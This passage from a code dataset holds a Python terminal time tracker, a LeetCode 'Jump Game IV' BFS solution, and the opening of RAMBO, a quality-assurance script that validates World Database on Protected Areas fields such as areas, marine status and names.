stopper.isSet():\n logger.debug('Stopping thread...')\n else:\n print('\\r{} - Task: {}'.format(spent, text), end='')\n\n\ndef store_task(desc, start, end):\n logger.info('Storing task %r-%r: %r', start, end, desc)\n with open('timesheet.txt', 'a') as f:\n fmt = '{:%Y-%m-%d %H:%M:%S} - {:%Y-%m-%d %H:%M:%S}\\n\\t{}'\n print(fmt.format(start, end, desc), file=f)\n\n\ndef hack_time():\n global text, start\n logger.debug('Hacking time... 
well, to record time spent hacking')\n stopper = threading.Event()\n display_event = threading.Event()\n display_thread = threading.Thread(\n target=display,\n args=(stopper, display_event),\n )\n display_thread.start()\n display_event.set()\n\n ch = ''\n while True:\n try:\n ch = getch()\n logger.debug('Read character %r', ch)\n if ch == '\\r':\n print()\n if text == 'q':\n logger.debug('Quitting...')\n stopper.set()\n break\n else:\n store_task(desc=text, start=start, end=datetime.now())\n text = ''\n start = datetime.now()\n elif ch.isspace() or ch.isprintable():\n text += ch\n elif ch in ('\\x7f', '\\x08'):\n spaces = re.sub('[^\\t]', ' ', 'xx:xx:xx - Task:'+text)\n print('\\r', spaces, end='')\n text = text[:-1]\n elif ch == '\\x1b':\n data = [getch(), getch()]\n logger.info('Got linux control character %r, eating'\n ' two bytes %r', ch, data)\n else:\n logger.warning('Unknown char: %r', ch)\n except (KeyboardInterrupt, EOFError) as e:\n stopper.set()\n print()\n break\n except:\n stopper.set()\n raise\n finally:\n display_event.set()\n\n logger.debug('Waiting for display thread to join...')\n display_thread.join()\n logger.debug('Display thread absorbed')\n\n\ndef pomodoro(days, hours, minutes, seconds):\n global text, start\n logger.debug('Running pomodoro interval for %dd%dh%dm%ds',\n days, hours, minutes, seconds)\n stopper = threading.Event()\n display_event = threading.Event()\n display_thread = threading.Thread(\n target=display,\n args=(stopper, display_event),\n )\n display_thread.start()\n display_event.set()\n\n start = datetime.now()\n tomato_length = timedelta(days=days, hours=hours, minutes=minutes,\n seconds=seconds)\n end = start+tomato_length\n\n ch = ''\n while True:\n try:\n ch = getch()\n if ch == 'q':\n stopper.set()\n print()\n break\n except (KeyboardInterrupt, EOFError) as e:\n stopper.set()\n print()\n break\n except:\n stopper.set()\n raise\n finally:\n display_event.set()\n display_thread.join()\n\n\n\ndef parse_timespan(timespan):\n logger.debug('Parsing %r', timespan)\n text_start, _, text_end = timespan.partition(' - ')\n fmt = '%Y-%m-%d %H:%M:%S'\n start = datetime.strptime(text_start, fmt)\n end = datetime.strptime(text_end, fmt)\n return start, end\n\n\ndef report_for_date(date):\n try:\n Span = namedtuple('Span', 'start, end')\n tasks = defaultdict(list)\n with open('timesheet.txt', 'r') as f:\n for timespan, task in zip(f,f):\n try:\n start, end = parse_timespan(timespan.rstrip())\n except ValueError:\n print('Unable to parse timespan {!r}, task: {!r}'\n .format(timespan.strip(), task.strip()))\n else:\n if start.date() <= date <= end.date():\n tasks[task.strip()].append(Span(start=start, end=end))\n\n for task in sorted(tasks):\n print(task)\n total = timedelta(0)\n for span in tasks[task]:\n total += span.end - span.start\n print('\\t{}'.format(total))\n except FileNotFoundError:\n print('Unable to find timesheet.txt, does it exist here?')\n\n\ndef main(args):\n if not args.args:\n hack_time()\n else:\n # TODO: Fix this pattern -W. 
Werner, 2016-11-04\n        pattern = r'(?=.*[smhd])(?:(\\d+)d)?\\s*(?:(\\d+)h)?\\s*(?:(\\d+)m)?\\s*(?:(\\d+)s)?'\n        # fullmatch, so plain words such as 'today' (which contains a 'd') cannot\n        # match as an empty duration; e.g. '1h30m' -> hours=1, minutes=30\n        match = re.fullmatch(pattern, args.args)\n        if match is None:\n            if args.args == 'today':\n                report_for_date(datetime.now().date())\n            else:\n                print('Unknown argument {!r}'.format(args.args))\n        else:\n            days, hours, minutes, seconds = (int(val or 0) for val in match.groups())\n            pomodoro(days=days, hours=hours, minutes=minutes, seconds=seconds)\n    print('Bye!')\n    \n\nif __name__ == '__main__':\n    args = arg_parser.parse_args()\n    args.args = ' '.join(args.args)\n    if args.debug:\n        log_filename = 'timetracker.log'\n        h = logging.FileHandler(log_filename)\n        for thing in (logger, h):\n            thing.setLevel(logging.DEBUG)\n        logger.addHandler(h)\n        logger.addHandler(logging.StreamHandler())\n        for h in logger.handlers:\n            h.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(threadName)s:%(message)s'))\n        logger.info('Logging information to %s', log_filename)\n        logger.handlers.pop()\n    logger.debug('Args %r', args)\n    main(args)\n    logger.debug('Shut down')\n","repo_name":"waynew/whelps","sub_path":"timetrack.py","file_name":"timetrack.py","file_ext":"py","file_size_in_byte":8180,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
{"seq_id":"72001394152","text":"'''\r\nGiven an array of integers arr, you are initially positioned at the first index of the array.\r\n\r\nIn one step you can jump from index i to index:\r\n\r\ni + 1 where: i + 1 < arr.length.\r\ni - 1 where: i - 1 >= 0.\r\nj where: arr[i] == arr[j] and i != j.\r\nReturn the minimum number of steps to reach the last index of the array.\r\n\r\nNotice that you cannot jump outside of the array at any time.\r\n\r\n \r\n\r\nExample 1:\r\n\r\nInput: arr = [100,-23,-23,404,100,23,23,23,3,404]\r\nOutput: 3\r\nExplanation: You need three jumps from index 0 --> 4 --> 3 --> 9. Note that index 9 is the last index of the array.\r\nExample 2:\r\n\r\nInput: arr = [7]\r\nOutput: 0\r\nExplanation: Start index is the last index.
You don't need to jump.\r\nExample 3:\r\n\r\nInput: arr = [7,6,9,6,9,6,9,7]\r\nOutput: 1\r\nExplanation: You can jump directly from index 0 to index 7, which is the last index of the array.\r\nExample 4:\r\n\r\nInput: arr = [6,1,9]\r\nOutput: 2\r\nExample 5:\r\n\r\nInput: arr = [11,22,7,7,7,7,7,7,7,22,13]\r\nOutput: 3\r\n \r\n\r\nConstraints:\r\n\r\n1 <= arr.length <= 5 * 10^4\r\n-10^8 <= arr[i] <= 10^8\r\nHint #1:\r\nBuild a graph of n nodes where nodes are the indices of the array and edges for node i are nodes i+1, i-1, j where arr[i] == arr[j].\r\nHint #2:\r\nStart BFS from node 0 and keep the distance; the answer is the distance when you reach node n-1.\r\n\r\n\r\n'''\r\n\r\nclass Solution:\r\n    def minJumps(self, arr) -> int:\r\n        n = len(arr)\r\n        if n <= 1:\r\n            return 0\r\n\r\n        graph = {}\r\n        for i in range(n):\r\n            if arr[i] in graph:\r\n                graph[arr[i]].append(i)\r\n            else:\r\n                graph[arr[i]] = [i]\r\n\r\n        curs = [0]  # store layers from start\r\n        visited = {0, n-1}\r\n        step = 0\r\n\r\n        other = [n-1]  # store layers from end\r\n\r\n        # while the current layer is non-empty\r\n        while curs:\r\n            # search from the side with fewer nodes\r\n            if len(curs) > len(other):\r\n                curs, other = other, curs\r\n            nex = []\r\n\r\n            # iterate the layer\r\n            for node in curs:\r\n\r\n                # check same value\r\n                for child in graph[arr[node]]:\r\n                    if child in other:\r\n                        return step + 1\r\n                    if child not in visited:\r\n                        visited.add(child)\r\n                        nex.append(child)\r\n\r\n                # clear the list to prevent redundant search\r\n                graph[arr[node]].clear()\r\n\r\n                # check neighbors\r\n                for child in [node-1, node+1]:\r\n                    if child in other:\r\n                        return step + 1\r\n                    if 0 <= child < len(arr) and child not in visited:\r\n                        visited.add(child)\r\n                        nex.append(child)\r\n\r\n            curs = nex\r\n            step += 1\r\n\r\n        return -1","repo_name":"Gangadharbhuvan/31_Days_Leetcode_Challenge-December","sub_path":"27.Jump_Game_IV/27.Jump_Game_IV.py","file_name":"27.Jump_Game_IV.py","file_ext":"py","file_size_in_byte":2847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"18729925840","text":"###################################################################################\n#### RAMBO: a Quality Assurance Tool for the World Database on Protected Areas ####\n#### Python script containing all quality assurance checks for the WDPA ####\n###################################################################################\n\n'''\nAuthor: Stijn den Haan\nSupervisor: Yichuan Shi\nBioinformatics internship • UNEP-WCMC • 10 June - 9 August 2019\n\nThis Python script contains all quality assurance checks for the WDPA that are part of RAMBO.\nThese checks are subsequently called by the 'main' scripts poly.py and point.py, \nto execute the checks on the WDPA feature class attribute table provided.\n\n## Definitions ##\n\n**Offending fields** are WDPA fields (columns) that contain values that do not adhere to the rules set in the WDPA manual or\ndo not adhere to general logical rules, e.g. the marine area of the protected area being larger than the total protected area.\n- Offending fields are subdivided into several types:\n    - *Duplicate*: records holding exactly the same values for all fields. Notably, the WDPA_PID field should not contain duplicates.\n    - *Inconsistent*: multiple records (rows) about the same protected area (same WDPAID) contain conflicting field information\n        - Example: records with the same `WDPAID` have different values present in field `NAME`, e.g.
'De Veluwe' vs 'De VeLUwe'.\n - *Invalid*: a record has an incorrect value for a particular field where only a particular set of values is allowed.\n - Example: `DESIG_TYPE` = 'Individual' while only 'National', 'International', and 'Regional' are allowed values for this field.\n - *Area invalid*: a record has an incorrect value for one or several area fields. \n - Example: `GIS_M_AREA` is larger than `GIS_AREA`.\n - *Forbidden character*: a record contains a field that has a forbidden character. These can affect downstream analyses on the WDPA.\n - Example: asterisk ('*') present in `NAME`.\n - *NaN values*: a record contains a field that is NA, NaN, or None, which can be the result of e.g. division by zero.\n\nIn this document, we use:\n- **field** to refer to a column of the database;\n - Example: `ISO3`\n- **value** to refer to each individual entry present in a field - i.e. the intersection of the field and row.\n - Example: 12345 present in field `WDPAID` on row 12\n'''\n\n###########################################\n##### 0. Load packages and WDPA fields ####\n###########################################\n\n#### Load packages ####\n\nimport numpy as np\nimport pandas as pd\nimport arcpy\nimport datetime\nimport os\nimport re\n\n#### Load fields present in the WDPA tables ####\n\n# Polygon data\n\nINPUT_FIELDS_POLY = ['WDPAID', 'WDPA_PID', 'PA_DEF', 'NAME', 'ORIG_NAME', 'DESIG', \n 'DESIG_ENG', 'DESIG_TYPE', 'IUCN_CAT', 'INT_CRIT', 'MARINE', 'REP_M_AREA', \n 'GIS_M_AREA', 'REP_AREA', 'GIS_AREA', 'NO_TAKE', 'NO_TK_AREA', 'STATUS', 'STATUS_YR', \n 'GOV_TYPE', 'OWN_TYPE', 'MANG_AUTH', 'MANG_PLAN', 'VERIF', 'METADATAID', 'SUB_LOC', \n 'PARENT_ISO3', 'ISO3', ]\n\n# Point data\n\nINPUT_FIELDS_PT = ['WDPAID', 'WDPA_PID', 'PA_DEF', 'NAME', 'ORIG_NAME', 'DESIG', \n 'DESIG_ENG', 'DESIG_TYPE', 'IUCN_CAT', 'INT_CRIT', 'MARINE', 'REP_M_AREA', \n 'REP_AREA', 'NO_TAKE', 'NO_TK_AREA', 'STATUS', 'STATUS_YR', 'GOV_TYPE', \n 'OWN_TYPE', 'MANG_AUTH', 'MANG_PLAN', 'VERIF', 'METADATAID', 'SUB_LOC', \n 'PARENT_ISO3', 'ISO3', ]\n\n# Source Table\n\nINPUT_FIELDS_META = ['METADATAID','DATA_TITLE','RESP_PARTY','VERIFIER','YEAR',\n 'UPDATE_YR', 'LANGUAGE','CHAR_SET','REF_SYSTEM', 'SCALE', \n 'LINEAGE', 'CITATION','DISCLAIMER', ]\n\n\n\n#####################################################\n#### 1. Convert ArcGIS table to pandas DataFrame ####\n#####################################################\n\n# Use this for the Polygons, Points, and the Source Table\n\n# Source: https://gist.github.com/d-wasserman/e9c98be1d0caebc2935afecf0ba239a0\ndef arcgis_table_to_df(in_fc, input_fields, query=''):\n '''\n Function will convert an arcgis table into a pandas DataFrame with an OBJECTID index, and the selected\n input fields using an arcpy.da.SearchCursor.\n For in_fc, specify the name of the geodatabase (.gdb) and feature class attribute table\n \n ## Arguments ##\n in_fc -- feature class attribute table - inside geodatabase - to import. \n Specify: /\n input_fields -- list of all fields that must be imported from the dataset\n query -- optional where_clause of arcpy.da.SearchCursor. 
Leave default for normal usage.\n\n ## Example ##\n arcgis_table_to_df(in_fc='WDPA_Jun2019_Public.gdb/WDPA_Jun2019_errortest',\n input_fields=input_fields_poly,\n query='')\n '''\n\n OIDFieldName = arcpy.Describe(in_fc).OIDFieldName # obtain OBJECTID field.\n final_fields = [OIDFieldName] + input_fields # Make a list of all fields that need to be extracted\n data = [row for row in arcpy.da.SearchCursor(in_fc,final_fields,where_clause=query)] # for all fields, obtain all rows\n fc_dataframe = pd.DataFrame(data,columns=final_fields) # Put data into pandas DataFrame\n fc_dataframe = fc_dataframe.set_index(OIDFieldName,drop=True) # set OBJECTID as index, but no longer use it as column\n fc_dataframe.replace('', np.nan, inplace=True) # set '' to np.nan\n\n return fc_dataframe\n\n\n#########################################\n##### 1.1 Obtain allowed ISO3 values ####\n#########################################\n\n# Download from GitHub and store in a pandas DataFrame\ncolumn_with_iso3 = ['alpha-3']\nurl = 'https://raw.githubusercontent.com/lukes/ISO-3166-Countries-with-Regional-Codes/master/all/all.csv'\niso3_df = pd.read_csv(url, usecols = column_with_iso3)\niso3 = np.append(iso3_df['alpha-3'].values, 'ABNJ')\n\n#######################################\n#### 2. Utility & hardcoded checks ####\n#######################################\n\n'''\nThe utility returns a subset of the WDPA DataFrame based on a list of WDPA_PIDs provided.\nThe hardcoded checks are not Factory Functions that can handle different inputs. Instead,\nthese are specific checks that have a set of input variables that cannot change.\n\n'''\n\n#############################################################################\n#### 2.0. Utility to extract rows from the WDPA, based on WDPA_PID input ####\n#############################################################################\n\ndef find_wdpa_rows(wdpa_df, wdpa_pid):\n '''\n Return a subset of DataFrame based on wdpa_pid list\n\n ## Arguments ##\n wdpa_df -- wdpa DataFrame\n wdpa_pid -- a list of WDPA_PIDs\n '''\n \n return wdpa_df[wdpa_df['WDPA_PID'].isin(wdpa_pid)]\n\n#######################################\n#### 2.1. Find duplicate WDPA_PIDs ####\n#######################################\n\ndef duplicate_wdpa_pid(wdpa_df, return_pid=False):\n '''\n Return True if WDPA_PID is duplicate in the DataFrame. \n Return list of WDPA_PID, if duplicates are present \n and return_pid is set True.\n '''\n\n if return_pid:\n ids = wdpa_df['WDPA_PID'] # make a variable of the field to find\n return ids[ids.duplicated()].unique() # return duplicate WDPA_PIDs\n\n return wdpa_df['WDPA_PID'].nunique() != wdpa_df.index.size # this returns True if there are WDPA_PID duplicates\n\n###########################################################################\n#### 2.2. 
Invalid: MARINE designation based on GIS_AREA and GIS_M_AREA ####\n###########################################################################\n\ndef area_invalid_marine(wdpa_df, return_pid=False):\n '''\n Assign a new 'MARINE' value based on GIS calculations, called marine_GIS_value\n Return True if marine_GIS_value is unequal to MARINE\n Return list of WDPA_PIDs where MARINE is invalid, if return_pid is set True\n '''\n \n # set min and max for 'coastal' designation (MARINE = 1)\n coast_min = 0.1\n coast_max = 0.9\n \n # create new column with proportion marine vs total GIS area \n wdpa_df['marine_GIS_proportion'] = wdpa_df['GIS_M_AREA'] / wdpa_df['GIS_AREA']\n \n def assign_marine_gis_value(wdpa_df):\n if wdpa_df['marine_GIS_proportion'] <= coast_min:\n return '0'\n elif coast_min < wdpa_df['marine_GIS_proportion'] < coast_max:\n return '1'\n elif wdpa_df['marine_GIS_proportion'] >= coast_max:\n return '2'\n \n # calculate the marine_value\n wdpa_df['marine_GIS_value'] = wdpa_df.apply(assign_marine_gis_value, axis=1)\n \n # find invalid WDPA_PIDs\n invalid_wdpa_pid = wdpa_df[wdpa_df['marine_GIS_value'] != wdpa_df['MARINE']]['WDPA_PID'].values\n \n if return_pid:\n return invalid_wdpa_pid\n \n return len(invalid_wdpa_pid) > 0\n\n############################################\n#### 2.3. Invalid: GIS_AREA >> REP_AREA ####\n############################################\n\ndef area_invalid_too_large_gis(wdpa_df, return_pid=False):\n '''\n Return True if GIS_AREA is too large compared to REP_AREA - based on thresholds specified below.\n Return list of WDPA_PIDs where GIS_AREA is too large compared to REP_AREA, if return_pid=True\n '''\n \n # Set maximum allowed absolute difference between GIS_AREA and REP_AREA (in km²)\n MAX_ALLOWED_SIZE_DIFF_KM2 = 50\n\n # Create two Series:\n # One to calculate the mean and stdev without outliers\n # One to use as index, to find WDPA_PIDs with a too large GIS_AREA\n\n # Compare GIS_AREA to REP_AREA, replace outliers with NaN, then obtain mean and stdev\n # Settings\n calc = (wdpa_df['REP_AREA'] + wdpa_df['GIS_AREA']) / wdpa_df['REP_AREA']\n condition = [calc > 100,\n calc < 0]\n choice = [np.nan,np.nan]\n\n # Produce column without outliers\n relative_size_stats = pd.Series( \n np.select(condition, choice, default = calc))\n\n # Calculate the maximum allowed values for relative_size using mean and stdev\n max_gis = relative_size_stats.mean() + (2*relative_size_stats.std())\n\n # Series: compare REP_AREA to GIS_AREA\n relative_size = pd.Series((wdpa_df['REP_AREA'] + wdpa_df['GIS_AREA']) / wdpa_df['REP_AREA'])\n\n # Find the rows with an incorrect GIS_AREA\n invalid_wdpa_pid= wdpa_df[(relative_size > max_gis) & (abs(wdpa_df['GIS_AREA']-wdpa_df['REP_AREA']) > MAX_ALLOWED_SIZE_DIFF_KM2)]['WDPA_PID'].values\n \n if return_pid:\n return invalid_wdpa_pid\n\n return len(invalid_wdpa_pid) > 0\n\n############################################\n#### 2.4. 
Invalid: REP_AREA >> GIS_AREA ####\n############################################\n\ndef area_invalid_too_large_rep(wdpa_df, return_pid=False):\n '''\n Return True if REP_AREA is too large compared to GIS_AREA - based on thresholds specified below.\n Return list of WDPA_PIDs where REP_AREA is too large compared to GIS_AREA, if return_pid=True\n '''\n \n # Set maximum allowed absolute difference between GIS_AREA and REP_AREA (in km²)\n MAX_ALLOWED_SIZE_DIFF_KM2 = 50\n\n # Create two Series:\n # One to calculate the mean and stdev without outliers\n # One to use as index, to find WDPA_PIDs with a too large REP_AREA\n\n # Compare GIS_AREA to REP_AREA, replace outliers with NaN, then obtain mean and stdev\n # Settings\n calc = (wdpa_df['REP_AREA'] + wdpa_df['GIS_AREA']) / wdpa_df['GIS_AREA']\n condition = [calc > 100,\n calc < 0]\n choice = [np.nan,np.nan]\n\n # Produce Series without outliers\n relative_size_stats = pd.Series( \n np.select(condition, choice, default = calc))\n\n # Calculate the maximum and minimum allowed values for relative_size using mean and stdev\n max_rep = relative_size_stats.mean() + (2*relative_size_stats.std())\n\n # Series: compare REP_AREA to GIS_AREA\n relative_size = pd.Series((wdpa_df['REP_AREA'] + wdpa_df['GIS_AREA']) / wdpa_df['GIS_AREA'])\n\n # Find the rows with an incorrect REP_AREA\n invalid_wdpa_pid= wdpa_df[(relative_size > max_rep) & (abs(wdpa_df['REP_AREA']-wdpa_df['GIS_AREA']) > MAX_ALLOWED_SIZE_DIFF_KM2)]['WDPA_PID'].values\n \n if return_pid:\n return invalid_wdpa_pid\n\n return len(invalid_wdpa_pid) > 0\n\n################################################\n#### 2.5. Invalid: GIS_M_AREA >> REP_M_AREA ####\n################################################\n\ndef area_invalid_too_large_gis_m(wdpa_df, return_pid=False):\n '''\n Return True if GIS_M_AREA is too large compared to REP_M_AREA - based on thresholds specified below.\n Return list of WDPA_PIDs where GIS_M_AREA is too large compared to REP_M_AREA, if return_pid=True\n '''\n \n # Set maximum allowed absolute difference between GIS_M_AREA and REP_M_AREA (in km²)\n MAX_ALLOWED_SIZE_DIFF_KM2 = 50\n\n # Create two Series:\n # One to calculate the mean and stdev without outliers\n # One to use as index, to find WDPA_PIDs with a too large GIS_M_AREA\n\n # Compare GIS_M_AREA to REP_M_AREA, replace outliers with NaN, then obtain mean and stdev\n # Settings\n calc = (wdpa_df['REP_M_AREA'] + wdpa_df['GIS_M_AREA']) / wdpa_df['REP_M_AREA']\n condition = [calc > 100,\n calc < 0]\n choice = [np.nan,np.nan]\n\n # Produce column without outliers\n relative_size_stats = pd.Series( \n np.select(condition, choice, default = calc))\n\n # Calculate the maximum and minimum allowed values for relative_size using mean and stdev\n max_gis = relative_size_stats.mean() + (2*relative_size_stats.std())\n\n # Series: compare REP_M_AREA to GIS_M_AREA\n relative_size = pd.Series((wdpa_df['REP_M_AREA'] + wdpa_df['GIS_M_AREA']) / wdpa_df['REP_M_AREA'])\n\n # Find the rows with an incorrect GIS_M_AREA\n invalid_wdpa_pid= wdpa_df[(relative_size > max_gis) & (abs(wdpa_df['GIS_M_AREA']-wdpa_df['REP_M_AREA']) > MAX_ALLOWED_SIZE_DIFF_KM2)]['WDPA_PID'].values\n \n if return_pid:\n return invalid_wdpa_pid\n\n return len(invalid_wdpa_pid) > 0\n\n################################################\n#### 2.6. 
Invalid: REP_M_AREA >> GIS_M_AREA ####\n################################################\n\ndef area_invalid_too_large_rep_m(wdpa_df, return_pid=False):\n '''\n Return True if REP_M_AREA is too large compared to GIS_M_AREA - based on thresholds specified below.\n Return list of WDPA_PIDs where REP_M_AREA is too large compared to GIS_M_AREA, if return_pid=True\n '''\n \n # Set maximum allowed absolute difference between GIS_M_AREA and REP_M_AREA (in km²)\n MAX_ALLOWED_SIZE_DIFF_KM2 = 50\n \n # Create two Series:\n # One to calculate the mean and stdev without outliers\n # One to use as index, to find WDPA_PIDs with a too large REP_M_AREA\n\n # Compare GIS_M_AREA to REP_M_AREA, replace outliers with NaN, then obtain mean and stdev\n # Settings\n calc = (wdpa_df['REP_M_AREA'] + wdpa_df['GIS_M_AREA']) / wdpa_df['GIS_M_AREA']\n condition = [calc > 100,\n calc < 0]\n choice = [np.nan,np.nan]\n\n # Produce column without outliers\n relative_size_stats = pd.Series( \n np.select(condition, choice, default = calc))\n\n # Calculate the maximum and minimum allowed values for relative_size using mean and stdev\n max_rep = relative_size_stats.mean() + (2*relative_size_stats.std())\n\n # Series: compare REP_M_AREA to GIS_M_AREA\n relative_size = pd.Series((wdpa_df['REP_M_AREA'] + wdpa_df['GIS_M_AREA']) / wdpa_df['GIS_M_AREA'])\n\n # Find the rows with an incorrect REP_M_AREA\n invalid_wdpa_pid= wdpa_df[(relative_size > max_rep) & (abs(wdpa_df['REP_M_AREA']-wdpa_df['GIS_M_AREA']) > MAX_ALLOWED_SIZE_DIFF_KM2)]['WDPA_PID'].values\n\n if return_pid:\n return invalid_wdpa_pid\n\n return len(invalid_wdpa_pid) > 0\n\n#######################################################\n#### 2.7. Invalid: GIS_AREA <= 0.0001 km² (100 m²) ####\n#######################################################\n\ndef area_invalid_gis_area(wdpa_df, return_pid=False):\n '''\n Return True if GIS_AREA is smaller than 0.0001 km²\n Return list of WDPA_PIDs where GIS_AREA is smaller than 0.0001 km², if return_pid=True\n '''\n \n # Arguments\n size_threshold = 0.0001\n field_gis_area = 'GIS_AREA'\n \n # Find invalid WDPA_PIDs\n invalid_wdpa_pid = wdpa_df[wdpa_df[field_gis_area] <= size_threshold]['WDPA_PID'].values\n \n if return_pid:\n return invalid_wdpa_pid\n \n return len(invalid_wdpa_pid) > 0\n\n#######################################################\n#### 2.8. Invalid: REP_AREA <= 0.0001 km² (100 m²) ####\n#######################################################\n\ndef area_invalid_rep_area(wdpa_df, return_pid=False):\n '''\n Return True if REP_AREA is smaller than 0.0001 km²\n Return list of WDPA_PIDs where REP_AREA is smaller than 0.0001 km², if return_pid=True\n '''\n \n # Arguments\n size_threshold = 0.0001\n field_rep_area = 'REP_AREA'\n \n # Find invalid WDPA_PIDs\n invalid_wdpa_pid = wdpa_df[wdpa_df[field_rep_area] <= size_threshold]['WDPA_PID'].values\n \n if return_pid:\n return invalid_wdpa_pid\n \n return len(invalid_wdpa_pid) > 0\n\n############################################################\n#### 2.9. 
Invalid: REP_M_AREA <= 0 when MARINE = 1 or 2 ####\n############################################################\n\ndef area_invalid_rep_m_area_marine12(wdpa_df, return_pid=False):\n '''\n Return True if REP_M_AREA is smaller than or equal to 0 while MARINE = 1 or 2\n Return list of WDPA_PIDs where REP_M_AREA is invalid, if return_pid=True\n '''\n \n # Arguments\n field = 'REP_M_AREA'\n field_allowed_values = 0\n condition_field = 'MARINE'\n condition_crit = ['1','2']\n \n # Find invalid WDPA_PIDs\n invalid_wdpa_pid = wdpa_df[(wdpa_df[field] <= field_allowed_values) & (wdpa_df[condition_field].isin(condition_crit))]['WDPA_PID'].values\n \n if return_pid:\n return invalid_wdpa_pid\n \n return len(invalid_wdpa_pid) > 0\n\n##########################################################\n## 2.10. Invalid: GIS_M_AREA <= 0 when MARINE = 1 or 2 ###\n##########################################################\n\ndef area_invalid_gis_m_area_marine12(wdpa_df, return_pid=False):\n '''\n Return True if GIS_M_AREA is smaller than or equal to 0 while MARINE = 1 or 2\n Return list of WDPA_PIDs where GIS_M_AREA is invalid, if return_pid=True\n '''\n \n # Arguments\n field = 'GIS_M_AREA'\n field_allowed_values = 0\n condition_field = 'MARINE'\n condition_crit = ['1','2']\n \n # Find invalid WDPA_PIDs\n invalid_wdpa_pid = wdpa_df[(wdpa_df[field] <= field_allowed_values) & (wdpa_df[condition_field].isin(condition_crit))]['WDPA_PID'].values\n \n if return_pid:\n return invalid_wdpa_pid\n \n return len(invalid_wdpa_pid) > 0\n\n########################################################\n## 2.11. Invalid: NO_TAKE, NO_TK_AREA and REP_M_AREA ####\n########################################################\n\ndef invalid_no_take_no_tk_area_rep_m_area(wdpa_df, return_pid=False):\n '''\n Return True if NO_TAKE = 'All' while the REP_M_AREA is unequal to NO_TK_AREA\n Return list of WDPA_PIDs where NO_TAKE is invalid, if return_pid=True\n '''\n\n # Select rows with NO_TAKE = 'All'\n no_take_all = wdpa_df[wdpa_df['NO_TAKE']=='All']\n \n # Select rows where the REP_M_AREA is unequal to NO_TK_AREA\n invalid_wdpa_pid = no_take_all[no_take_all['REP_M_AREA'] != no_take_all['NO_TK_AREA']]['WDPA_PID'].values\n \n if return_pid:\n return invalid_wdpa_pid\n \n return len(invalid_wdpa_pid) > 0\n\n############################################################################\n## 2.12. Invalid: INT_CRIT & DESIG_ENG - non-Ramsar Site, non-WHS sites ####\n############################################################################\n\ndef invalid_int_crit_desig_eng_other(wdpa_df, return_pid=False):\n '''\n Return True if DESIG_ENG is something else than Ramsar Site (...)' or 'World Heritage Site (...)'\n while INT_CRIT is unequal to 'Not Applicable'. Other-than Ramsar / WHS should not contain anything\n else than 'Not Applicable'.\n Return list of WDPA_PIDs where INT_CRIT is invalid, if return_pid is set True\n '''\n \n # Arguments\n field = 'DESIG_ENG'\n field_allowed_values = ['Ramsar Site, Wetland of International Importance', \n 'World Heritage Site (natural or mixed)']\n condition_field = 'INT_CRIT'\n condition_crit = ['Not Applicable']\n \n # Find invalid WDPA_PIDs\n invalid_wdpa_pid = wdpa_df[(~wdpa_df[field].isin(field_allowed_values)) & (~wdpa_df[condition_field].isin(condition_crit))]['WDPA_PID'].values\n \n if return_pid:\n return invalid_wdpa_pid\n \n return len(invalid_wdpa_pid) > 0\n\n#########################################################################\n#### 2.13. 
Invalid: DESIG_ENG & IUCN_CAT - non-UNESCO, non-WHS sites ####\n#########################################################################\n\ndef invalid_desig_eng_iucn_cat_other(wdpa_df, return_pid=False):\n    '''\n    Return True if IUCN_CAT is unequal to the allowed values\n    and DESIG_ENG is unequal to 'UNESCO-MAB (...)' or 'World Heritage Site (...)'\n    Return list of WDPA_PIDs where IUCN_CAT is invalid, if return_pid is set True\n    '''\n\n    # Arguments\n    field = 'IUCN_CAT'\n    field_allowed_values = ['Ia',\n                            'Ib',\n                            'II',\n                            'III',\n                            'IV',\n                            'V',\n                            'VI',\n                            'Not Reported',\n                            'Not Assigned']\n    condition_field = 'DESIG_ENG'\n    condition_crit = ['UNESCO-MAB Biosphere Reserve', \n                      'World Heritage Site (natural or mixed)']\n    \n    # Find invalid WDPA_PIDs\n    invalid_wdpa_pid = wdpa_df[(~wdpa_df[field].isin(field_allowed_values)) & (~wdpa_df[condition_field].isin(condition_crit))]['WDPA_PID'].values\n\n    if return_pid:\n        return invalid_wdpa_pid\n    \n    return len(invalid_wdpa_pid) > 0\n\n#########################################################\n#### 3. Find inconsistent fields for the same WDPAID ####\n#########################################################\n\n#### Factory Function ####\n\ndef inconsistent_fields_same_wdpaid(wdpa_df, \n                                    check_field, \n                                    return_pid=False):\n    '''\n    Factory Function: this generic function is to be linked to\n    the family of 'inconsistent' input functions stated below. These latter \n    functions are to give information on which fields to check and pull \n    from the DataFrame. This function is the foundation of the others.\n    \n    This function checks the WDPA for inconsistent values and \n    returns a list of WDPA_PIDs that have invalid values for the specified field(s).\n\n    Return True if inconsistent fields are found for rows \n    sharing the same WDPAID\n\n    Return list of WDPA_PIDs where inconsistencies occur, if \n    return_pid is set True\n\n    ## Arguments ##\n    check_field -- string of the field to check for inconsistency\n    \n    ## Example ##\n    inconsistent_fields_same_wdpaid(\n        wdpa_df=wdpa_df,\n        check_field=\"DESIG_ENG\",\n        return_pid=True)\n    '''\n\n    if return_pid:\n        # Group by WDPAID to find duplicate WDPAIDs and count the \n        # number of unique values for the field in question\n        wdpaid_groups = wdpa_df.groupby(['WDPAID'])[check_field].nunique()\n\n        # Select all duplicated WDPAID groups with >1 unique value for \n        # the specified field ('check_field') and use their index to\n        # return the WDPA_PIDs\n        return wdpa_df[wdpa_df['WDPAID'].isin(wdpaid_groups[wdpaid_groups > 1].index)]['WDPA_PID'].values\n    \n    # Return True if any WDPAID has more than 1 unique value for the field\n    return (wdpa_df.groupby('WDPAID')[check_field].nunique() > 1).sum() > 0\n\n#### Input functions ####\n\n#################################\n#### 3.1. Inconsistent NAME #####\n#################################\n\ndef inconsistent_name_same_wdpaid(wdpa_df, return_pid=False):\n    '''\n    This function is to capture inconsistencies in the field 'NAME'\n    for records with the same WDPAID\n    \n    Input: WDPA in pandas DataFrame \n    Output: list with WDPA_PIDs containing field inconsistencies\n    '''\n\n    check_field = 'NAME'\n    \n    # The call below passes check_field and return_pid on to the\n    # factory function, which evaluates wdpa_df for this field\n    return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n
